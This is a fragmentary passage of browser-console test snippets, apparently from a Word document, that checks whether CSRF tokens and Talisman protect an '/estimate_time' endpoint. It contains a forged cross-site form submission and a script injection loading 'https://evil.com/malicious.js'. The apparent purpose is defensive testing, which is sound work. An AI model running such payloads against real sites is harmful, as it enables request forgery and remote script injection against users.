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CSRF Token- avoid outside CSRF attack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fetch('/estimate_time', {method:'POST', body:'start_location=test'}).then(r=&gt;r.text()).then(console.log)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var form = document.createElement('form');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form.method = 'POST';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form.action = '/estimate_time';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var input = document.createElement('input');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input.type = 'text';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input.name = 'start_location';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input.value = 'Malicious';</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">input.name = 'end_location';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input.value = 'Hacked';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form.appendChild(input);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document.body.appendChild(form);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form.submit();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Talisman avoid XSS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s = document.createElement('script');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s.src = 'https://evil.com/malicious.js';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s.onerror = () =&gt; console.log('Script load error');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document.head.appendChild(s);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fetch('http://' + window.location.host + '/estimate_time',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headers: { 'Content-Type': 'application/x-www-form-urlencoded'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body: 'start_location=attacker&amp;end_location=hijacked',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redirect: 'manual'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}).then(response =&gt;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(response.status === 200)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console.error('Man in the Middle Successfully! Danger!!');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console.log('Response Status：', response.status);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}).catch(e =&gt; console.log('Defender Successfully, Hacker won’t capture any data:', e));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